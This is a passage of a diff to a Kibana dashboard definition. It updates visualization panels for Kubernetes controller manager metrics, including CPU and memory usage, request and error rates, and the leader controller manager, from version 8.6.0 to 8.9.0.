"yRight": true + }, + "fillOpacity": 0.3, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "hideEndzones": false, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "301759e0-f73e-4e6d-a7c5-d0938024e989" + ], + "layerId": "d3be0fa3-c7a4-49ba-b8cf-ab79f477f332", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "9edf62a7-afd2-4574-9937-34f7ee0c5fcd", + "xAccessor": "236eb2de-d45f-43f2-83f4-5a1d7355132b", + "yConfig": [ + { + "axisMode": "left", + "color": "#d6bf57", + "forAccessor": "301759e0-f73e-4e6d-a7c5-d0938024e989" + } + ] + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "shouldTruncate": false }, - "gridData": { - "h": 6, - "i": "75255ce8-2d49-4b4f-ac0e-a20fe8f4daec", - "w": 24, - "x": 0, - "y": 44 + "preferredSeriesType": "area", + "showCurrentTimeMarker": false, + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "75255ce8-2d49-4b4f-ac0e-a20fe8f4daec", - "title": "Controller manager process data", - "type": "lens", - "version": "8.6.0" + "valueLabels": "hide", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-77da5988-3f03-4e8f-b1e4-39a94d8bec07", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "236aa40a-181f-4c61-af17-8df4ecba80d3", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "77da5988-3f03-4e8f-b1e4-39a94d8bec07": { - "columnOrder": [ - "7e1756d9-af1b-4204-a8d4-8c57987216f0", - "d523e6d2-50f3-4b45-8815-8259df43850c", - "cf481e4f-b568-4306-8da9-5e3d516ccbea", - "cf481e4f-b568-4306-8da9-5e3d516ccbeaX0" - ], - "columns": { - "7e1756d9-af1b-4204-a8d4-8c57987216f0": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of host.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "host.name" - }, - "cf481e4f-b568-4306-8da9-5e3d516ccbea": { - "dataType": "number", - "isBucketed": false, - "label": "average(kubernetes.controllermanager.process.memory.resident.bytes)", - "operationType": "formula", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 1 - } - }, - "formula": "average(kubernetes.controllermanager.process.memory.resident.bytes)", - "isFormulaBroken": false - }, - "references": [ - "cf481e4f-b568-4306-8da9-5e3d516ccbeaX0" - ], - "scale": "ratio" - }, - "cf481e4f-b568-4306-8da9-5e3d516ccbeaX0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of average(kubernetes.controllermanager.process.memory.resident.bytes)", - "operationType": "average", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.process.memory.resident.bytes" - }, - "d523e6d2-50f3-4b45-8815-8259df43850c": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "CPU usage increase over time" + }, + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 3, + "i": "f8313a9d-ab58-448e-b183-75f914caf53f", + "w": 48, + "x": 0, + "y": 62 + }, + "panelIndex": "f8313a9d-ab58-448e-b183-75f914caf53f", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "params": { + "axis_formatter": "number", + "axis_position": "left", + "axis_scale": "normal", + "background_color": "rgba(249,235,223,1)", + "drop_last_bucket": 0, + "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", + "index_pattern_ref_name": "metrics_f8313a9d-ab58-448e-b183-75f914caf53f_0_index_pattern", + "interval": "", + "isModelInvalid": false, + "markdown": "HTTP Requests", + "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", + "markdown_vertical_align": "middle", + "max_lines_legend": 1, + "series": [ + { + "axis_position": "right", + "chart_type": "line", + "color": "#68BC00", + "fill": 0.5, + "formatter": "default", + "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", + "line_width": 1, + "metrics": [ + { + "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", + "type": "count" + } + ], + "override_index_pattern": 0, + "palette": { + "name": "default", + "type": "palette" + }, + "point_size": 1, + "separate_axis": 0, + "series_drop_last_bucket": 0, + "split_mode": "everything", + "stacked": "none", + "time_range_mode": "entire_time_range" + } + ], + "show_grid": 1, + "show_legend": 1, + "time_field": "", + "time_range_mode": "entire_time_range", + "tooltip_mode": "show_all", + "truncate_legend": 1, + "type": "markdown", + "use_kibana_indexes": true + }, + "title": "", + "type": "metrics", + "uiState": {} + }, + "type": "visualization" + }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "fd90adaf-517f-4b92-a5b5-c29f7a16663b", + "w": 24, + "x": 0, + "y": 65 + }, + "panelIndex": "fd90adaf-517f-4b92-a5b5-c29f7a16663b", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-1048fff9-f5a4-446b-8173-e9e22d4b1cff", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "11922ebb-686e-4ad0-a043-e425a0d2ce35", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "1048fff9-f5a4-446b-8173-e9e22d4b1cff": { + "columnOrder": [ + "37b94d21-2d12-4136-a81d-908d8fc7f78a", + "52732cce-1342-46e1-8273-82efeffe9aac", + "469efac9-749a-455e-9864-90dc0f5f954e", + "e014cfcb-3d50-4bbe-a6e6-4d8ea547ec4e" + ], + "columns": { + "37b94d21-2d12-4136-a81d-908d8fc7f78a": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Cluster", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "236aa40a-181f-4c61-af17-8df4ecba80d3", - "key": "kubernetes.controllermanager.process.cpu.sec", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "kubernetes.controllermanager.process.cpu.sec" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0.3, - "layers": [ - { - "accessors": [ - "cf481e4f-b568-4306-8da9-5e3d516ccbea" - ], - "layerId": "77da5988-3f03-4e8f-b1e4-39a94d8bec07", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "7e1756d9-af1b-4204-a8d4-8c57987216f0", - "xAccessor": "d523e6d2-50f3-4b45-8815-8259df43850c", - "yConfig": [] - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right", - "shouldTruncate": false - }, - "preferredSeriesType": "area", - "title": "Empty XY chart", - "valueLabels": "hide", - "valuesInLegend": false, - "xTitle": "", - "yTitle": "" - } + "size": 3 + }, + "scale": "ordinal", + "sourceField": "orchestrator.cluster.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 18, - "i": "303702e1-ba33-49f2-b337-4cc7d7305606", - "w": 24, - "x": 24, - "y": 44 - }, - "panelIndex": "303702e1-ba33-49f2-b337-4cc7d7305606", - "title": "Average resident memory", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-d3be0fa3-c7a4-49ba-b8cf-ab79f477f332", - "type": "index-pattern" + "469efac9-749a-455e-9864-90dc0f5f954e": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Host", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - { - "id": "metrics-*", - "name": "a781e55e-e2bc-4b36-b197-1b55842aeff7", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "d3be0fa3-c7a4-49ba-b8cf-ab79f477f332": { - "columnOrder": [ - "9edf62a7-afd2-4574-9937-34f7ee0c5fcd", - "236eb2de-d45f-43f2-83f4-5a1d7355132b", - "301759e0-f73e-4e6d-a7c5-d0938024e989", - "301759e0-f73e-4e6d-a7c5-d0938024e989X1", - "301759e0-f73e-4e6d-a7c5-d0938024e989X0" - ], - "columns": { - "236eb2de-d45f-43f2-83f4-5a1d7355132b": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "301759e0-f73e-4e6d-a7c5-d0938024e989": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Increases in Controller CPU", - "operationType": "formula", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 1, - "suffix": "s" - } - }, - "formula": "counter_rate(last_value(kubernetes.controllermanager.process.cpu.sec))", - "isFormulaBroken": false - }, - "references": [ - "301759e0-f73e-4e6d-a7c5-d0938024e989X1" - ], - "scale": "ratio" - }, - "301759e0-f73e-4e6d-a7c5-d0938024e989X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.process.cpu.sec: *" - }, - "isBucketed": false, - "label": "Part of Increases in Controller CPU", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.process.cpu.sec" - }, - "301759e0-f73e-4e6d-a7c5-d0938024e989X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Increases in Controller CPU", - "operationType": "counter_rate", - "references": [ - "301759e0-f73e-4e6d-a7c5-d0938024e989X0" - ], - "scale": "ratio", - "timeScale": "s" - }, - "9edf62a7-afd2-4574-9937-34f7ee0c5fcd": { - "dataType": "string", - "isBucketed": true, - "label": "Top 20 values of host.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": false, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 20 - }, - "scale": "ordinal", - "sourceField": "host.name" - } - }, - "incompleteColumns": {} - } - } - } + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "a781e55e-e2bc-4b36-b197-1b55842aeff7", - "key": "kubernetes.controllermanager.process.cpu.sec", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "kubernetes.controllermanager.process.cpu.sec" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "size": 5 + }, + "scale": "ordinal", + "sourceField": "host.name" + }, + "52732cce-1342-46e1-8273-82efeffe9aac": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Leader controller manager name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0.3, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "hideEndzones": false, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "301759e0-f73e-4e6d-a7c5-d0938024e989" - ], - "layerId": "d3be0fa3-c7a4-49ba-b8cf-ab79f477f332", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "9edf62a7-afd2-4574-9937-34f7ee0c5fcd", - "xAccessor": "236eb2de-d45f-43f2-83f4-5a1d7355132b", - "yConfig": [ - { - "axisMode": "left", - "color": "#d6bf57", - "forAccessor": "301759e0-f73e-4e6d-a7c5-d0938024e989" - } - ] - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right", - "shouldTruncate": false - }, - "preferredSeriesType": "area", - "showCurrentTimeMarker": false, - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "xTitle": "", - "yTitle": "" - } + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 3 + }, + "scale": "ordinal", + "sourceField": "kubernetes.controllermanager.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "e014cfcb-3d50-4bbe-a6e6-4d8ea547ec4e": { + "dataType": "boolean", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.leader.is_master: *" + }, + "isBucketed": false, + "label": "Last value of kubernetes.controllermanager.leader.is_master", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.leader.is_master" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "11922ebb-686e-4ad0-a043-e425a0d2ce35", + "key": "kubernetes.controllermanager.leader.is_master", + "negate": false, + "params": { + "query": true }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "1604f0de-edd6-456e-8670-ab9b33988abb", - "w": 24, - "x": 0, - "y": 50 - }, - "panelIndex": "1604f0de-edd6-456e-8670-ab9b33988abb", - "title": "CPU usage increase over time", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "description": "", - "params": { - "axis_formatter": "number", - "axis_position": "left", - "axis_scale": "normal", - "background_color": "rgba(249,235,223,1)", - "drop_last_bucket": 0, - "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", - "index_pattern_ref_name": "metrics_f8313a9d-ab58-448e-b183-75f914caf53f_0_index_pattern", - "interval": "", - "isModelInvalid": false, - "markdown": "HTTP Requests", - "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", - "markdown_vertical_align": "middle", - "max_lines_legend": 1, - "series": [ - { - "axis_position": "right", - "chart_type": "line", - "color": "#68BC00", - "fill": 0.5, - "formatter": "default", - "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", - "line_width": 1, - "metrics": [ - { - "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", - "type": "count" - } - ], - "override_index_pattern": 0, - "palette": { - "name": "default", - "type": "palette" - }, - "point_size": 1, - "separate_axis": 0, - "series_drop_last_bucket": 0, - "split_mode": "everything", - "stacked": "none", - "time_range_mode": "entire_time_range" - } - ], - "show_grid": 1, - "show_legend": 1, - "time_field": "", - "time_range_mode": "entire_time_range", - "tooltip_mode": "show_all", - "truncate_legend": 1, - "type": "markdown", - "use_kibana_indexes": true - }, - "title": "", - "type": "metrics", - "uiState": {} + "type": "phrase" + }, + "query": { + "match_phrase": { + "kubernetes.controllermanager.leader.is_master": true } - }, - "gridData": { - "h": 3, - "i": "f8313a9d-ab58-448e-b183-75f914caf53f", - "w": 48, - "x": 0, - "y": 62 - }, - "panelIndex": "f8313a9d-ab58-448e-b183-75f914caf53f", - "title": "", - "type": "visualization", - "version": "8.6.0" + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "alignment": "center", + "columnId": "469efac9-749a-455e-9864-90dc0f5f954e", + "isTransposed": false, + "width": 256.6666666666667 + }, + { + "columnId": "e014cfcb-3d50-4bbe-a6e6-4d8ea547ec4e", + "hidden": true, + "isTransposed": false + }, + { + "alignment": "center", + "columnId": "52732cce-1342-46e1-8273-82efeffe9aac", + "isTransposed": false + }, + { + "alignment": "center", + "columnId": "37b94d21-2d12-4136-a81d-908d8fc7f78a", + "isTransposed": false, + "width": 345.66666666666663 + } + ], + "headerRowHeight": "auto", + "layerId": "1048fff9-f5a4-446b-8173-e9e22d4b1cff", + "layerType": "data", + "rowHeight": "auto" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-1048fff9-f5a4-446b-8173-e9e22d4b1cff", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Leader controller manager" + }, + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 5, + "i": "83449269-d517-4fe6-9266-9d875070d90d", + "w": 24, + "x": 24, + "y": 65 + }, + "panelIndex": "83449269-d517-4fe6-9266-9d875070d90d", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "**NOTE**: The default period to fetch the metrics used in **Requests and responses counter rate** visualization is **10s**. The timestamps from the visualizations were chosen according to that. Otherwise, they might be inaccurate. Adjust them by clicking on the **settings wheel** on the top right of the visualization and go to the **right side menu**. After that, write the custom period value on **Horizontal axis > @timestamp > Minimum interval**.", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + }, + "type": "visualization" + } + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "91a7ce56-6a49-4b7e-837f-31c184b48c09", + "w": 24, + "x": 24, + "y": 70 + }, + "panelIndex": "91a7ce56-6a49-4b7e-837f-31c184b48c09", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-7c7c4b67-a2df-427f-abbd-635e5fa73a9c", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "692cad49-25ea-40b4-87d2-535b5f35ecd4", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "7c7c4b67-a2df-427f-abbd-635e5fa73a9c": { + "columnOrder": [ + "d3b90051-0bb2-41e0-9d5d-34ff145dba09", + "8a2e9cea-60fb-4603-a072-9b0e6194344c", + "63268365-bb35-456f-831c-78238984a061", + "63268365-bb35-456f-831c-78238984a061X0", + "63268365-bb35-456f-831c-78238984a061X1", + "24a01536-55c3-4c11-b62e-20a2a5435663", + "24a01536-55c3-4c11-b62e-20a2a5435663X1", + "24a01536-55c3-4c11-b62e-20a2a5435663X0", + "1028ba4a-0d68-4d8d-8340-f7a2966f546d", + "1028ba4a-0d68-4d8d-8340-f7a2966f546dX1", + "1028ba4a-0d68-4d8d-8340-f7a2966f546dX0" + ], + "columns": { + "1028ba4a-0d68-4d8d-8340-f7a2966f546d": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.code >= 500" + }, + "isBucketed": false, + "label": "Server errors", + "operationType": "formula", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 0 + } }, - { - "id": "metrics-*", - "name": "11922ebb-686e-4ad0-a043-e425a0d2ce35", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "1048fff9-f5a4-446b-8173-e9e22d4b1cff": { - "columnOrder": [ - "37b94d21-2d12-4136-a81d-908d8fc7f78a", - "52732cce-1342-46e1-8273-82efeffe9aac", - "469efac9-749a-455e-9864-90dc0f5f954e", - "e014cfcb-3d50-4bbe-a6e6-4d8ea547ec4e" - ], - "columns": { - "37b94d21-2d12-4136-a81d-908d8fc7f78a": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Cluster", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "orchestrator.cluster.name" - }, - "469efac9-749a-455e-9864-90dc0f5f954e": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Host", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "host.name" - }, - "52732cce-1342-46e1-8273-82efeffe9aac": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Leader controller manager name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 3 - }, - "scale": "ordinal", - "sourceField": "kubernetes.controllermanager.name" - }, - "e014cfcb-3d50-4bbe-a6e6-4d8ea547ec4e": { - "dataType": "boolean", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.leader.is_master: *" - }, - "isBucketed": false, - "label": "Last value of kubernetes.controllermanager.leader.is_master", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.leader.is_master" - } - }, - "incompleteColumns": {} - } - } - } + "formula": "counter_rate(last_value(kubernetes.controllermanager.client.request.count))", + "isFormulaBroken": false + }, + "references": [ + "1028ba4a-0d68-4d8d-8340-f7a2966f546dX1" + ], + "scale": "ratio", + "timeScale": "s" + }, + "1028ba4a-0d68-4d8d-8340-f7a2966f546dX0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.code >= 500" + }, + "isBucketed": false, + "label": "Part of Server errors", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.client.request.count" + }, + "1028ba4a-0d68-4d8d-8340-f7a2966f546dX1": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.code >= 500" + }, + "isBucketed": false, + "label": "Part of Server errors", + "operationType": "counter_rate", + "references": [ + "1028ba4a-0d68-4d8d-8340-f7a2966f546dX0" + ], + "scale": "ratio", + "timeScale": "s" + }, + "24a01536-55c3-4c11-b62e-20a2a5435663": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.code >= 400 and kubernetes.controllermanager.code < 500" + }, + "isBucketed": false, + "label": "Client errors", + "operationType": "formula", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 0 + } }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "11922ebb-686e-4ad0-a043-e425a0d2ce35", - "key": "kubernetes.controllermanager.leader.is_master", - "negate": false, - "params": { - "query": true - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "kubernetes.controllermanager.leader.is_master": true - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "formula": "counter_rate(last_value(kubernetes.controllermanager.client.request.count))", + "isFormulaBroken": false + }, + "references": [ + "24a01536-55c3-4c11-b62e-20a2a5435663X1" + ], + "scale": "ratio", + "timeScale": "s" + }, + "24a01536-55c3-4c11-b62e-20a2a5435663X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.code >= 400 and kubernetes.controllermanager.code < 500" + }, + "isBucketed": false, + "label": "Part of Client errors", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.client.request.count" + }, + "24a01536-55c3-4c11-b62e-20a2a5435663X1": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.code >= 400 and kubernetes.controllermanager.code < 500" + }, + "isBucketed": false, + "label": "Part of Client errors", + "operationType": "counter_rate", + "references": [ + "24a01536-55c3-4c11-b62e-20a2a5435663X0" + ], + "scale": "ratio", + "timeScale": "s" + }, + "63268365-bb35-456f-831c-78238984a061": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Requests", + "operationType": "formula", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 0 + } }, - "visualization": { - "columns": [ - { - "alignment": "center", - "columnId": "469efac9-749a-455e-9864-90dc0f5f954e", - "isTransposed": false, - "width": 256.6666666666667 - }, - { - "columnId": "e014cfcb-3d50-4bbe-a6e6-4d8ea547ec4e", - "hidden": true, - "isTransposed": false - }, - { - "alignment": "center", - "columnId": "52732cce-1342-46e1-8273-82efeffe9aac", - "isTransposed": false - }, - { - "alignment": "center", - "columnId": "37b94d21-2d12-4136-a81d-908d8fc7f78a", - "isTransposed": false, - "width": 345.66666666666663 - } - ], - "headerRowHeight": "auto", - "layerId": "1048fff9-f5a4-446b-8173-e9e22d4b1cff", - "layerType": "data", - "rowHeight": "auto" - } + "formula": "counter_rate(last_value(kubernetes.controllermanager.client.request.count))", + "isFormulaBroken": false + }, + "references": [ + "63268365-bb35-456f-831c-78238984a061X1" + ], + "scale": "ratio", + "timeScale": "s" }, - "title": "", - "type": "lens", - "visualizationType": "lnsDatatable" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 6, - "i": "fd90adaf-517f-4b92-a5b5-c29f7a16663b", - "w": 24, - "x": 0, - "y": 65 - }, - "panelIndex": "fd90adaf-517f-4b92-a5b5-c29f7a16663b", - "title": "Leader controller manager", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "63268365-bb35-456f-831c-78238984a061X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.client.request.count: *" + }, + "isBucketed": false, + "label": "Part of Requests", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.client.request.count" }, - "description": "", - "id": "", - "params": { - "fontSize": 12, - "markdown": "**NOTE**: The default period to fetch the metrics used in **Requests and responses counter rate** visualization is **10s**. The timestamps from the visualizations were chosen according to that. Otherwise, they might be inaccurate. Adjust them by clicking on the **settings wheel** on the top right of the visualization and go to the **right side menu**. After that, write the custom period value on **Horizontal axis \u003e @timestamp \u003e Minimum interval**.", - "openLinksInNewTab": false + "63268365-bb35-456f-831c-78238984a061X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Requests", + "operationType": "counter_rate", + "references": [ + "63268365-bb35-456f-831c-78238984a061X0" + ], + "scale": "ratio", + "timeScale": "s" }, - "title": "", - "type": "markdown", - "uiState": {} - } - }, - "gridData": { - "h": 5, - "i": "83449269-d517-4fe6-9266-9d875070d90d", - "w": 24, - "x": 24, - "y": 65 - }, - "panelIndex": "83449269-d517-4fe6-9266-9d875070d90d", - "type": "visualization", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-7c7c4b67-a2df-427f-abbd-635e5fa73a9c", - "type": "index-pattern" + "8a2e9cea-60fb-4603-a072-9b0e6194344c": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "10s" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "d3b90051-0bb2-41e0-9d5d-34ff145dba09": { + "dataType": "string", + "isBucketed": true, + "label": "Top values", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - { - "id": "metrics-*", - "name": "692cad49-25ea-40b4-87d2-535b5f35ecd4", - "type": "index-pattern" - } - ], - "state": { - 